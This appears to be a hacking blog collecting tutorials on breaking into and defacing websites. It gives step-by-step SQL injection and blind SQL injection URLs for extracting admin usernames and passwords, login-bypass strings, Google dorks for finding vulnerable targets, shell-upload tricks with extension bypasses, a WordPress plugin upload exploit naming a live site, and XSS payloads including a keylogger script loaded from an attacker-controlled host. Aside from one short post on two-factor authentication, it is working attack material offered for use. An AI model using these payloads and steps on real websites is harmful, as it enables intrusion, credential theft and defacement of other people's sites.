Widgets How To Find Vulnerability On A Website Web Vulnerability

As We All know website gets hacked due to vulnerabilities exist on that site so today i will be giving a brief article on finding Web Vulnerability

Now a days Hackers are concentrating a lot of their efforts to find holes in a web application,And This Is the major reason Reason Why Thousands Of Website Getting hacked.If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.

Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available through which even a newbie can find a vulnerable site and start Hacking.

Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:

1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Remote File Upload Vulnerability (Exploits)
5.Local File inclusion(LFI)
6.DDOS attack
7.Google Dorks

And Many More See the Left side Category Box...

I Have Putted My Effort And Written All These types of Attack On my Site With Deatil Tutorial few with examples Please Go Through It If You want to Be A Real Hacker.

Now..
Some Of The Tools that are Mostly used By hacker to hack website Or find Vulnerability on A Website.

Tools Used To Find Website Vulnerability By Hacker.

Acunetix:

Acunetix is one of my favorite tool to find a venerability in any web application It automatically checks your web applications for SQL Injection, XSS & all other web vulnerabilities.

Download Acunetix For Our link

Nessus:

Nessus is the best unix venerability testing tool and among the best to run on windows. Key features of this software include Remote and local file securitychecks a client/server architecture with a GTK graphical interface etc.

Download Nessus

Retina
Retina is another Vulnerability assessment tool,It scans all the hosts on a network and report on any vulnerabilities found.

Download Retina


Metasploit Framework :

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public and tested exploits.

Download Metasploit(For Windows users)

Thanks For Reading

Keep Visitng :- Indicyborg

Read More

SQL Injection And Defacement For Beginners Complete Tutorial

1. What is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

2. What is Defacement ?

A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.
 
What do you need before you start with SQL Injection.
 
*You need Admin Finder ( to find admin panel from website )*
*SQL Injection Vulnerable Scanner*
 
Admin Finder:
Download Admin Finder
 
Vulnerable Scanner:
Download ADVANCED HAVIJ Scanner

Dorks for Finding Vulnerable sites!:
Common Dorks
inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=

MD5 Hash Crackers Online:

http://www.md5crack.com
http://www.md5decrypter.com
http://www.md5decrypter.co.uk
http://md5.rednoize.com
http://md5decryption.com
http://www.md5decrypter.com
http://passcracking.com
http://md5.my-addr.com/md5_decrypt-md5_c…r_tool.php
http://www.xmd5.org
http://www.md5cracker.com/index.php
http://md5.noisette.ch/index.php
http://md5cracker.org

Text to ASCII Converter:

http://www.mikezilla.com/exp0012.html?ascii=login&hex=%2578&unicode=%26%23120;
http://getyourwebsitehere.com/jswb/text_to_ascii.html

Shell:
 
http://www.kinginfet.net/shells/

Some vulnerable websites
Starting Tutorial:

1. First you need to find vulnerable website.

http://sql-vuln-site.com/index.php?id=15

2. Now you need to find columns.

http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )

Error’s looks like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’39′ at line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=’39

3. Now Select columns
Columns is 5

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5–
 
4. Finding version.
So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I choose 1

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5–

you got the version like this:
5.0.32-Debian_7etch11-log

5. Finding Tables
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables–
And you will got tables like this:
PRODUCTS , ADMINS , and others
So must be there table by name: admin , users , user , login , client.
 
6. Finding Columns in the Table ADMINS.

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()–

We found ADMINS table now go to ASCII web and convert ADMINS
You will got this ADMINS
Remove &# and replace ; to ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)–

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)–

And you will got the columns in table ADMINS
There need to have columns with names: username and password
 
7. Getting username and password.

Now we put concat(username,0x3a,password) and admins

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins–

( 0x3a is ASCII )
8. Finded username and password
So you found the username and password
if the password is hash like this: 2510c39011c5be704182423e3a695e91
you will need to use MD5 Hash Online Crackers.
If password is not hash you are lucky and now you need to find admin panel.

9. Finding Admin Panel

Open the tool Admin Finder
Put the website in the bellow and click Scan.
So you found admin panel and it looks like this http://sql-vuln-site.com/admin/login.php

You open website and there have Username: Password:
Put username and password what you got.
Done you login in Admin Panel lets upload shell and deface.

10. Uploading Shell and Add Deface

In Admin Panel you will search categories or anything where you can upload a file or picture.
When you found, you will download shell from the website who i tell you before start tutorial so you will try to upload your shell like: r57.php when you upload it you will see the link of the upload and open it like this:

http://sql-vuln-site.com/upload/r57.php

If can’t upload r57.php change it to r57.jpg.php or r57.txt and try!

You need to make a deface page in html and put in the website
So you open the shell,you will found a file index.php and click on it and there you will remove the php code from index and put your html code.
 
Congratulations you deface the website.


Thanks For Reading..

Keep Visiting :- Indicyborg

Read More

How To Hack Using Sqli Sql Injection + Sql Injection Complete Tut

Yestarday i have posted on article on BLIND SQLI TO HACK WEBSITE Today i am posting basic of hacking that is sqlinjection

As we all know A large number of websites are vulnerable to SQL injection attacks these days.Here i am going to discuss what is SQL injection and how it is done to hack any website. Now-a-days, many noobs find an SQL error in database by automated scanners and just exploit it for fun.Even i haven't used my skills for any bad purpose. This post is about those people who don't know that their website is actually vulnerable to such attack, also i am going to tell you that how its done and how to catch this vulnerability.Due to such vulnerability a Hacker can gain access to your website within a minute.

What is SQL Injection Actually?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
In simple words I must say that hacker injects certain characters in the admin authentication area and gains access as admin.

How is basic SQL injection Accomplished?

Google is very helping in hacking, due to dork technique, Now you will think that what is dork?

Dork: A search enquiry to find a website specific to an attack type etc.

A few dorks are below, which are used to find, vulnerable site:

"inurl:admin.asp"

"inurl:login/admin.asp"

"inurl:admin/login.asp"

These dorks are pasted in the search bar of google.com. and then searched to find the website.

After finding the required target, injection is accomplished, like in the login fields of admin, as password following injections are inserted:

    '1'='1' or'1'(works on 99% of sites best one by me)
    ' or '1'='1
    ' or 'x'='x

In simple words:

Username : Admin
Password : 'or'1'='1

Hit login and you are in, All the sites are not vulnerable and this is just for learning purpose, We are not responsible for any harm or damage caused.

That was just a simple tutorial to give you basic information of SQL injection. There are more advanced techniques too. But some other day i will discuss.

How to check that your website is vulnerable?

This is the most important part in hacking.

Well then, After reading the basics above you might have got the concept of SQL injection. But many tools are also available to scan your website or server for such errors in database, Note, When error occurs it means that website is vulnerable.

First Method:
 
Here is an online scanner:

    http://webhosting.blackoutaio.com/~sqli/

For example, If you want to scan, www.website-wamiq.com then put this in scanner bar:

    inurl:php?=id+site:website-wamiq.com

If you get:

    http://www.website-wamiq.com/product.php?id='3 <== Success





Then it means that website is vulnerable and can be exploited easily by getting the number of colums.
(Note: catid, data, num is also used in addition to id. Simply replace id with your desired value in the dork of scanner.)
Here i got screen shot of a Website with dork "data" instead of "id" vulnerable to the attack it has scanned it overall and here are results:

Second Method:

Here is an automated scanner, Which is for newbies, Just click scan and take rest.
Go to this link to get detailed information on how to find SQL vulnerability in website.
To get Acunetix vulnerability scanner Trial version go here.


Hope, Now you might be aware of SQL injections. Futher information will be posted later.


Thanks For Reading This :p

Keep Visiting :-Indicyborg

Read More

Blind Sqli Tutorial To Hack A Website

Blind Sqli is one of the most famous technique to hack a website..it is being used by many great hacker over the world to hack many banking websites as well as many popular websites.
Still today also millions of webs sites and vulnerable, can be turn down and credential information can be leaked using this "Blind Sqli" ...

Here is the complete step by step tutorial


Before going into it lets understand what is Blind Sqli?

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.Mean to say The page with the vulnerability may not be one that displays data but will display differently depending on the logical statement injected. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

The steps Begins here:
Suppose That You want to Hack This website with Blind Sqli for that you have to find such type of link shown below..

http://site.com/index.php?id=5

when we execute this, we see some page and articles on that page, pictures
etc…

then when we want to test it for blind sql injection attack


http://www.site.com/index.php?id=5 and 1=1

this is always true and the page loads normally,that's ok.

now the real test
 
http://www.site.com/index.php?id=5 and 1=2

this is false

so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring i.e

http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
when select don't work then we use subselect

i.e
http://www.site.com/index.php?id=5 and (select 1)=1

if page loads normally then subselects work.
then we gonna see if we have access to mysql.
user

i.e
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can

pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend
i.e.

http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1

(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users
exits.

if you get FALSE (some article missing),
just change table name until you
guess the right one :)

let's say that we have found that table name is users,
now what we need is
column name.

the same as table name,
we start guessing. Like i said before try the
common names for columns.

i.e

http://www.site.com/index.php?id=5 and (select substring(concat(1,
password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get
false then try common names or just guess)

here we merge 1 with the column password,
then substring returns the first
character (,1,1)


4). Pull data from database


we found table users i columns username password so we gonna pull
characters from that.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length.
ascii()

converts that 1 character into ascii value
and then compare it with simbol greater then ">" .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher


http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!

so the first character in username is char(99). Using the ascii converter

we know that char(99) is letter 'c'.
then let's check the second character.


http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it
returns the second character, 1 character in lenght)

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!

we know that the second character is char(105) and that is 'i'. We have
'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know
that we have reach the end).

Thankz For Reading

Keep Visiting :- www.indicyborg.blogspot.in

Read More

Quick Tips About Wordpress Defacing

Wordpress Defacing without uploading Shell

usually after gaining admin acess on wordpress website we upload shell on website, its takes some extra time, even you can deface wordpress's index page without uploading shell !
Goto wordpress dashboard than theme editor and you'll see 2-3 thmes there like twenty ten and twenly eleven.
Look there for active Theme on That website and edit index.php of that theme. and you'll see your deface pages on website's home Page.

Bypassing Permission Denided for index.php in wordpress

sometimes after upload shell on wordpress website when you'll try to replace index.php's socurce code in public_html/ directory with you deface page, it will show error like permission denided, can't write in file etc, and sometimes permission change dones't work, then follow the same method whic is give above, change active theme's index.php file and home will chnage with your deface page.

Simple :)

Keep Visiting www.indicyborg.blogspot.in

Read More

Two factor Authentication on wordpress

What is two factor authentication ?

Two –Factor authentication is commonly found in electronic computer authentication, where basic authentication is the process of a requesting entity presenting some evidence of its identity to a second entity. Two-factor authentication seeks to decrease the probability that the requestor is presenting false evidence of its identity .

Duo Security Overview

Duo Security provides two-factor authentication as a service built to prevent account takeover and online fraud. Protect remote access with drop-in support for most VPNs and Unix, or add login or transaction verification to any website with Duo's powerful web APIs.

Benefits using Duo Security

Compliance: Easily meet federal and industry regulations for strong authentication such as PCI DSS and HIPAA.
Cost-effective: No hardware to deploy and manage, and self- service user enrollment to reduce administrative burden.
Scalable: Duo leverages the cloud to rapidly scale as your user base grows, removing the need for onsite infrastructure.
Compatible: Integrates seamlessly with existing technology investments and end-user smartphone platforms.

The content of this Article “Two-Factor Authentication on wordpress’’ is for public to know more about it and information is provided by various sources.

Read More

Wordpress Exploit : 10,000+ Websites are Vunerable For this attack

This venerability is known as WordPress Easy Comment Upload Venerability.
Google dorks:


"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads

Open Google and enetr any dork which Given,
Now selct any website
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Got Upload Option here :)
Now Upload Your Deface ....
and check it here site.com/wp-content/uploads/2011/05/yourfilehere


Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg

DEMO:
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/


Happy Hacking :p

Read More

How to Hack A Website using Xss Attack Keylogging

As we all know that Key logger is a program that allow us to view the key pressed by user.In this Tutorial we will learn how to use keylogger on a website to capture all the keystrokes on that page.
like i said previously Xss Attack or Cross site scripting is simple but it can be used in deadlier way

this tutorial only works on Xssed sites ...

As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website.

To perform this Attack we need three thigs

Xssed Site(That is a xss vulnerable site)

Webhosting sevice (Free)

Keylogging Script


First Of all Download the script from the below link

Download Script

Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file.

Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com just Change it to your hosting URl.

Now host all these scripts on your web host.

Now find a XSS vulnerable website website and include script link like this:
 
http://targetwebsite.com/search.php?q="<script src="http://yourwebsite.com/keylogger.js"></script>

Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script.

If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords.

I Hope You Like THis Topic...

Keep Visiting www.indicyborg.blogspot.in

Read More

XSS : Cross Site Scripting complete Tutorial

Hello friends today i am back with one of the most famous website hacking tutorial on "XSS Attack"
Number of worlds best sites including Microsoft,Google,Facebook, you tube and many more best company sites are vulnerable to Xss Attack.still today today also hackers from all over the world use this XSS : Cross Site Scripting to find Vulnerability on the best websites.

Here is the details tutorial on XSS/Cross Site Scripting and also how to exploit it.

What is XSS?, what can I accomplish with it?

XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.

Reason Behind XSS vulnerability?

Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it's also in the source code. They did not bother to filter what we type in. They allowed characters such as ">, ", /", etc.

Types of XSS

There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.
We discussing here The basics of XSS and cookie logging.

Tutorial On XSS

How to test for XSS vulnerabilities.

To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.

**<*script*>alert('XSS');

(Important:Please remove "*" or type the above text on search box without "*")

Now we will see a pop up message "XSS"shown In picture

Click here to see image

In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

"*>*alert('XSS'); (Important:Please remove '*' or type the above text on search box without '*') Now, we have found out that it is vulnerable.Lets go to next step.

Deface/Hacking a webpage with XSS?

Here is the important part that explain defacing website i have methods for both persistent, and non-persistent XSS.

Persistent XSS.

First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before: <*script*>window.location="*http://yourdefacepage.com/index.html";<*/script*> (Important:Please remove '*' or type the above text on search box without '*') Remember, you can always alter the code if it doesn't work. You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.

Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

How to make a cookie logger i will be posting soon stay touched with IndiCyborg

Read More